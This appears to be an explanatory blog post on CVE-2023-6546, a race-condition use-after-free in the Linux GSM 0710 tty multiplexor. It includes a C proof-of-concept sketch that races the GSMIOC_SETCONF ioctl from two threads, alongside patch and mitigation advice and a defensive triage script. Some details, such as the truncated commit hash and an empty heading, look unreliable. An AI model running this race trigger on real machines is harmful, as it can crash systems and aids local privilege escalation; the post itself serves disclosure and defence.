CVE-2023-6546 - Race Condition in Linux GSM 0710 tty Multiplexor Lets Attackers Get Root

CVE-2023-6546 is a newly discovered security issue in the Linux kernel affecting the GSM 0710 tty multiplexor. This bug can let a regular (unprivileged) user on a Linux machine gain root access, or crash the system. Let’s break down how this bug works, see a code snippet, link to original sources, and explore how it can be exploited.

What Is the GSM 0710 tty Multiplexor?

The *GSM 0710 tty multiplexor* (n_gsm line discipline) is a kernel driver used for multiplexing several virtual serial ports over a single serial port, following the 3GPP TS 07.10 standard. You’d find it on embedded devices, things like modems, and sometimes Linux servers with special hardware attached.

The Problem: Race Condition and Use-After-Free

CVE-2023-6546 is a *race condition* in the handling of the GSMIOC_SETCONF ioctl call. If two processes/threads call GSMIOC_SETCONF at the same time on the same tty with the gsm mux mode turned on, it's possible for one thread to free a structure (struct gsm_dlci) while the other thread is still using it. That’s called “use-after-free”.

Here’s a simplified explanation:

1. Thread A and Thread B both open the same tty file and set the GSM line discipline (N_GSM0710).
2. Both simultaneously call the GSMIOC_SETCONF ioctl on the same tty.
3. The driver restarts the GSM mux (multiplexer) as part of this. Both try to reconfigure things in parallel.
4. During this, memory for a data structure (struct gsm_dlci) is freed by one thread but is still used by the other.
5. Classic use-after-free! If an attacker is clever, they can control what gets written after the free, and thus get code execution in kernel mode.

Code Snippet: Where It Goes Wrong

The core of the bug is in the gsmld_ioctl() function in the file drivers/tty/n_gsm.c. Here’s a snippet before the patch (simplified):

```c
case GSMIOC_SETCONF:
    // Reconfigure gsm mux
    gsm_cleanup_mux(gsm);                      // Frees old channels (gsm_dlci)
    ret = gsm_activate_mux(gsm, &gsm_config);  // Allocates new ones
    break;
```

If gsm_cleanup_mux() is called while another thread is still using the old gsm_dlci, you get a use-after-free!

Patch Fix: The kernel patch adds a mutex to serialize gsm mux reconfiguration.

Reference to the patch:
Linux kernel commit fixing CVE-2023-6546

An attacker needs:

- Ability to access a serial port device node (like /dev/ttyGS)
- Ability to load the n_gsm line discipline (may need CAP_SYS_ADMIN, but some setups allow regular users)

PoC Sketch (pseudo-code)

```c
#include <fcntl.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <linux/gsmmux.h>   /* GSMIOC_SETCONF, struct gsm_config */
#include <linux/tty.h>      /* N_GSM0710 */

static int fd;
static struct gsm_config conf;   /* zeroed; the sketch only races the ioctl */

void *thread_func(void *arg) {
    for (int i = 0; i < 100000; i++) {
        ioctl(fd, GSMIOC_SETCONF, &conf);
    }
    return NULL;
}

int main(void) {
    fd = open("/dev/ttyGS", O_RDWR);
    int ldisc = N_GSM0710;
    ioctl(fd, TIOCSETD, &ldisc);   // switch the tty to the n_gsm line discipline

    // Start two threads racing the ioctl
    pthread_t t1, t2;
    pthread_create(&t1, NULL, thread_func, NULL);
    pthread_create(&t2, NULL, thread_func, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}
```

Warning: Actually owning the race and exploiting use-after-free for code execution is non-trivial—you need deep kernel knowledge and typically heap spraying techniques.

- Denial of Service: an attacker can crash the machine
- Impact is local, but any process with serial/GSM access can try

Who’s affected?

How to Protect Your Linux System

- Upgrade: The vulnerability was fixed in Linux kernel commit c5ad531ae7daeca73a6aea92a114e1c3e3b7b6d (Jan 2024). Update to at least kernel 6.7.3, 6.6.15, 6.1.77, or the corresponding update for your distro.
- Restrict access: Lock down who can open GSM serial devices and load the n_gsm line discipline.
- Monitor for kernel OOPS/panics involving n_gsm
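A small triage script for the steps above, added here as an example (it is not from the original post or the kernel project). It compares the running kernel with the fixed versions listed above, checks whether the n_gsm line discipline is registered, and prints the modprobe rule that blocks loading the module; it assumes a Linux host with /proc/tty/ldiscs, and that the fixed versions are those named in this post (distro kernels may backport the fix under a different version, so treat "unknown" as "check your distro advisory").

```sh
#!/bin/sh
# Fixed upstream versions as stated in this post (assumption: mainline/stable numbering).
FIXED_VERSIONS="6.7.3 6.6.15 6.1.77"

# ver_ge A B: exit 0 if dotted version A >= B (missing components count as 0).
ver_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        for (i = 1; i <= 3; i++) {
            xi = (i <= na) ? x[i] + 0 : 0; yi = (i <= nb) ? y[i] + 0 : 0
            if (xi > yi) exit 0
            if (xi < yi) exit 1
        }
        exit 0
    }'
}

# cve_status KERNEL_RELEASE: prints fixed | vulnerable | unknown.
# The distro suffix after the first "-" (e.g. -generic) is ignored.
cve_status() {
    ver=$(printf '%s' "$1" | cut -d- -f1)
    series=$(printf '%s' "$ver" | cut -d. -f1,2)
    for f in $FIXED_VERSIONS; do
        if [ "$(printf '%s' "$f" | cut -d. -f1,2)" = "$series" ]; then
            if ver_ge "$ver" "$f"; then echo fixed; else echo vulnerable; fi
            return 0
        fi
    done
    echo unknown   # series not covered by the versions above
}

# /proc/tty/ldiscs lists registered line disciplines, one per line ("n_gsm  21").
n_gsm_registered() {
    [ -r /proc/tty/ldiscs ] && grep -q '^n_gsm[[:space:]]' /proc/tty/ldiscs
}

report() {
    running=$(uname -r)
    echo "kernel $running: $(cve_status "$running")"
    if n_gsm_registered; then
        echo "n_gsm line discipline is registered (module loaded or built in)"
    else
        echo "n_gsm line discipline is not registered"
    fi
    # Blocks loading the module; no effect if n_gsm is built into the kernel (CONFIG_N_GSM=y).
    echo "to block it: echo 'install n_gsm /bin/false' > /etc/modprobe.d/disable-n_gsm.conf"
}

if [ "${1:-}" = "--run" ]; then report; fi
```

Run it as `sh triage.sh --run`; the functions can also be sourced and called individually.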

References and Further Reading

- CVE-2023-6546 entry at NVD
- Linux kernel patch
- oss-security discussion list
- Red Hat CVE page

TL;DR

If your system doesn’t use n_gsm, you're likely safe. If you do, upgrade now! CVE-2023-6546 is a textbook example of how small race conditions in obscure kernel drivers can turn into major security problems—so patch early, patch often!

Timeline

Published on: 12/21/2023 20:15:08 UTC
Last modified on: 02/28/2024 15:15:07 UTC